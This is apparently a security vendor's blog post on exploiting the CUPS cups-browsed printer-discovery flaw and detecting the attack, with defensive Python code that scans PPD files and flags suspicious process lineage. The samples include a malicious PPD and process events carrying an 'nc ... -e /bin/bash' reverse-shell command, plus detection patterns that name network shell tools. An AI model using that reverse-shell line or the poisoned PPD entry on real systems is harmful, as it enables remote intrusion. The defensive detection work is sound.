A series of critical-severity bugs in the CUPS printer discovery mechanism (cups-browsed) affecting Linux hosts was recently disclosed. The vulnerabilities can be chained to register a malicious printer on a victim host and achieve unauthenticated remote code execution once a job is printed to it. Vulnerability details and working exploit code are already public. Uptycs released details about the vulnerabilities here.
In this blog we want to showcase how Uptycs detects and remediates exploitation attempts on a vulnerable machine.
CUPS Exploitation
For the purpose of exploitation we used this PoC.
From the attacker machine we run the exploit script to advertise a malicious printer named “BestPrinter” whose print command runs nc to open a reverse shell, as shown in the image below.
Fig 1. Running the exploit script
The command above sends a printer advertisement to the victim's cups-browsed service. cups-browsed listens for such announcements (over the legacy CUPS browsing protocol on UDP port 631 and via mDNS/DNS-SD) and registers any printer it hears about without verifying the sender.
On the victim machine, when we try to print a page from Firefox, the malicious printer appears in the printer list.
Fig 2. Malicious printer appears in victim machine
In the background, the victim host sends an IPP (Internet Printing Protocol) Get-Printer-Attributes request to the advertised URL to learn more about the printer. The exploit script answers with a crafted IPP response whose attributes carry the exploit command in the “FoomaticRIPCommandLine” field. cups-browsed turns those attributes into a temporary PPD (PostScript Printer Description) file for the new printer, so the PPD now tells CUPS to run the foomatic-rip filter for jobs sent to this printer, and foomatic-rip treats that field as the shell command line to execute for each job.
Fig 3. IPP request and response containing exploit command
Exploitation is only triggered when the victim actually sends a job to the printer, i.e. clicks the “Print” button.
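The chain above leaves a host-side artifact before any job is printed: the PPD that cups-browsed generated for the discovered printer (on a standard install the PPDs of installed printers live under /etc/cups/ppd/). The following is an added example, not code from the original post or from Uptycs, that parses PPD keyword entries and flags a FoomaticRIPCommandLine containing network tools or reverse-shell fragments, treating it as high severity only when a cupsFilter/cupsFilter2 line actually wires the printer to foomatic-rip. Both PPD samples are constructed and simplified; the indicator regexes are heuristics, and the path default is an assumption about a standard CUPS layout.

```python
"""Heuristic scan of CUPS PPD files for attacker-supplied filter command lines."""
import glob
import os
import re

# One PPD entry: *Keyword[ Option]: value. The value is either a quoted string
# (which may span several lines) or a bare token on the same line.
PPD_ENTRY = re.compile(
    r'^\*(?P<key>[A-Za-z0-9_.-]+)(?:[ \t]+(?P<option>[^:\n]+?))?[ \t]*:[ \t]*'
    r'(?P<value>"[^"]*"|[^\n]*)',
    re.MULTILINE,
)

# Heuristic indicators. Legitimate Foomatic PPDs carry long gs(1) command
# lines here, so we look for network tools and shell tricks, not for length.
REVERSE_SHELL = re.compile(
    r"/dev/tcp/|\b(?:nc|ncat|netcat|socat)\b|\b(?:bash|sh)\s+-i\b|\bmkfifo\b", re.I
)
DOWNLOADERS = re.compile(r"\b(?:curl|wget)\b", re.I)
SHELL_META = re.compile(r";|&&|\|\||`|\$\(")


def parse_ppd(text):
    """Return a list of (keyword, option, value) tuples with quotes stripped."""
    entries = []
    for m in PPD_ENTRY.finditer(text):
        value = m.group("value")
        if value.startswith('"') and value.endswith('"') and len(value) >= 2:
            value = value[1:-1]
        entries.append((m.group("key"), m.group("option"), value.strip()))
    return entries


def assess_ppd(text):
    """Return findings for one PPD. A command only runs if some cupsFilter
    line hands jobs to foomatic-rip, so that decides the severity."""
    entries = parse_ppd(text)
    wired = any(k in ("cupsFilter", "cupsFilter2") and "foomatic-rip" in v
                for k, _, v in entries)
    findings = []
    for key, _, value in entries:
        if key != "FoomaticRIPCommandLine":
            continue
        if REVERSE_SHELL.search(value) or DOWNLOADERS.search(value):
            reason, sev = "network/reverse-shell tool in filter command line", "high"
        elif SHELL_META.search(value):
            reason, sev = "shell metacharacters in filter command line", "medium"
        else:
            continue
        if not wired:            # present but never executed by a filter
            sev = {"high": "medium", "medium": "low"}[sev]
        findings.append({"severity": sev, "reason": reason, "command": value})
    return findings


def scan_ppd_dir(directory="/etc/cups/ppd"):
    """Assess every *.ppd under directory (assumed standard CUPS location)."""
    results = {}
    for path in glob.glob(os.path.join(directory, "*.ppd")):
        with open(path, encoding="utf-8", errors="replace") as fh:
            findings = assess_ppd(fh.read())
        if findings:
            results[path] = findings
    return results


# Constructed samples, modelled loosely on a cups-browsed generated PPD and on
# a stock Foomatic PPD; neither is a real file from the post.
MALICIOUS_PPD = '''\
*PPD-Adobe: "4.3"
*ModelName: "BestPrinter"
*NickName: "BestPrinter"
*cupsFilter2: "application/pdf application/vnd.cups-postscript 0 foomatic-rip"
*FoomaticRIPCommandLine: "nc 10.0.0.5 4444 -e /bin/bash"
*OpenUI *PageSize/Page Size: PickOne
*DefaultPageSize: A4
*PageSize A4/A4: "<</PageSize[595 842]>>setpagedevice"
*CloseUI: *PageSize
'''

BENIGN_PPD = '''\
*PPD-Adobe: "4.3"
*ModelName: "Generic PCL 6/PCL XL Printer"
*cupsFilter: "application/vnd.cups-postscript 100 foomatic-rip"
*FoomaticRIPCommandLine: "gs -q -dBATCH -dPARANOIDSAFER -dQUIET -dNOPAUSE
-sDEVICE=pxlmono -sOutputFile=- -"
*DefaultPageSize: Letter
'''

if __name__ == "__main__":
    for name, ppd in (("BestPrinter", MALICIOUS_PPD), ("Generic PCL", BENIGN_PPD)):
        print(name, assess_ppd(ppd))
    print(scan_ppd_dir())
```

Run it as a one-off on a suspect host, or feed the output of scan_ppd_dir into whatever inventory you already collect; a printer that appeared without an administrator adding it and whose PPD trips the high-severity rule is worth deleting before anyone prints to it.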
The exploit succeeds and a reverse shell connects back to the attacker machine. From that shell we gather system information, install cron jobs for persistence and deploy a coin miner.
Fig 4. Reverse shell connection is established
Fig 5. Post exploitation activities
Vulnerability Detection
Uptycs automatically scans the entire infrastructure (hosts, containers, images and Lambda functions) for affected packages and surfaces the results on a dashboard.
Fig 6. Trending Vulnerabilities
Clicking into a vulnerability opens a detailed vulnerability report.
Fig 7. Vulnerability Scan Report for CUPS CVEs.
Vulnerabilities are prioritized by evaluating the environment in which they are found: whether the asset is exposed to the internet, whether a process from the vulnerable package is currently running, and whether that process runs with elevated privileges. The mere presence of a vulnerable package ranks lower than a running process from that package, and lower still than such a process running as a privileged user. If the asset is exposed to the internet (receiving inbound connections from public IP addresses) the priority is raised further. For cups-browsed specifically, the exposure that matters is whether its UDP 631 listener is reachable from networks you do not trust.
Fig 8. Vulnerable process and package details
Uptycs does not stop at detecting the vulnerability: it also protects customer infrastructure against attackers who try to exploit it.
Alerts Triggered in Uptycs
Uptycs detects exploitation activity and protects hosts from being compromised. In Protect mode it blocks the exploitation at its initial stage by killing the malicious process launched by the attacker, stopping the compromise of the target machine. In Detect mode the exploitation is not blocked, but every step of the attacker's activity is alerted on and deep telemetry is collected so investigators can conduct forensic analysis.
Exploitation in Protect Mode
When Uptycs is configured in Protect mode, the attack is stopped at the point where the exploit's payload launches the reverse shell.
Fig 9. Attack is blocked in Protect mode
Fig 10. Detection view in Protect mode
Exploitation in Detect Mode
In Detect mode we see the full attack chain: the foomatic-rip process, whose parent is cupsd, launches a shell that runs the reverse shell and then the coin miner. Note that foomatic-rip legitimately spawns a renderer such as Ghostscript for normal jobs, so the signal is a shell invoking nc or another network tool underneath the filter, not the existence of a child process on its own.
Fig 11. Detection view in Detect mode
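The lineage shown in Fig 11 can be expressed as a detection rule over process events. The following is an added example, not code from the original post or from Uptycs: given process records (pid, ppid, name, cmdline, user) it walks each process's ancestry and alerts when a network tool, or a shell with a reverse-shell-looking command line or a network tool as parent, descends from foomatic-rip running under cupsd. The event list is constructed for the example (a legitimate foomatic-rip job driving gs, a malicious one running nc, and an unrelated interactive bash), and the suspicious-command regex is a heuristic you should tune to your environment.

```python
"""Flag shells and network tools spawned underneath a CUPS print filter."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    name: str
    cmdline: str
    user: str


# Binaries that have no business running under a print filter.
NETWORK_TOOLS = {"nc", "ncat", "netcat", "socat", "curl", "wget", "telnet"}
SHELLS = {"sh", "bash", "dash", "zsh"}
# Command-line fragments typical of reverse shells and post-exploitation.
SUSPICIOUS_CMD = re.compile(
    r"/dev/tcp/|\bnc\b.*\s-e\s|\b(?:bash|sh)\s+-i\b|\bmkfifo\b|\bcrontab\b|\bbase64\s+-d\b",
    re.IGNORECASE,
)


def ancestry(proc, table):
    """Return [proc, parent, grandparent, ...] by following ppid links."""
    chain, seen, cur = [proc], {proc.pid}, proc
    while cur.ppid in table and cur.ppid not in seen:
        cur = table[cur.ppid]
        seen.add(cur.pid)
        chain.append(cur)
    return chain


def is_suspicious(proc, table):
    """A network tool, a shell with a reverse-shell-looking command line, or a
    shell whose parent is a network tool (the 'nc -e /bin/bash' case)."""
    if proc.name in NETWORK_TOOLS:
        return True
    if proc.name in SHELLS:
        if SUSPICIOUS_CMD.search(proc.cmdline):
            return True
        parent = table.get(proc.ppid)
        if parent is not None and parent.name in NETWORK_TOOLS:
            return True
    return False


def detect_filter_abuse(procs):
    """Return one 'child <- parent <- ...' chain per suspicious process that
    descends from foomatic-rip, which in turn descends from cupsd."""
    table = {p.pid: p for p in procs}
    alerts = []
    for p in procs:
        if not is_suspicious(p, table):
            continue
        names = [a.name for a in ancestry(p, table)]
        if ("foomatic-rip" in names and "cupsd" in names
                and names.index("foomatic-rip") < names.index("cupsd")):
            alerts.append(" <- ".join(names))
    return alerts


# Constructed process events for the example (not real telemetry).
SAMPLE_EVENTS = [
    Proc(1, 0, "systemd", "/sbin/init", "root"),
    Proc(800, 1, "cupsd", "/usr/sbin/cupsd -l", "root"),
    # Legitimate job: foomatic-rip runs Ghostscript via sh -c.
    Proc(1200, 800, "foomatic-rip", "foomatic-rip 12 lp report 1 PageSize=A4", "lp"),
    Proc(1201, 1200, "sh", "sh -c gs -q -dBATCH -dNOPAUSE -sDEVICE=pxlmono -sOutputFile=- -", "lp"),
    Proc(1202, 1201, "gs", "gs -q -dBATCH -dNOPAUSE -sDEVICE=pxlmono -sOutputFile=- -", "lp"),
    # Malicious job against the attacker-advertised printer.
    Proc(1300, 800, "foomatic-rip", "foomatic-rip 13 lp page 1 PageSize=A4", "lp"),
    Proc(1301, 1300, "sh", "sh -c nc 10.0.0.5 4444 -e /bin/bash", "lp"),
    Proc(1302, 1301, "nc", "nc 10.0.0.5 4444 -e /bin/bash", "lp"),
    Proc(1303, 1302, "bash", "/bin/bash", "lp"),
    # Interactive user shell: looks odd in isolation but is not under cupsd.
    Proc(2000, 1, "bash", "bash -i", "alice"),
]

if __name__ == "__main__":
    for alert in detect_filter_abuse(SAMPLE_EVENTS):
        print("ALERT:", alert)
```

The parent chain is what keeps the rule quiet: the same `bash -i` that would be flagged under foomatic-rip is ignored when it hangs off a user's login session, and the Ghostscript job under the first foomatic-rip produces nothing. In Protect mode you would kill the first process in the chain that trips the rule; in Detect mode you would keep the whole chain and the user (here the unprivileged lp account) for the investigation.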
Connect with our Team
The Uptycs team is ready to help. If you would like to learn more about the Uptycs Platform, speak to one of our experts, and see a demo of how to investigate and remediate issues like this one contact us today.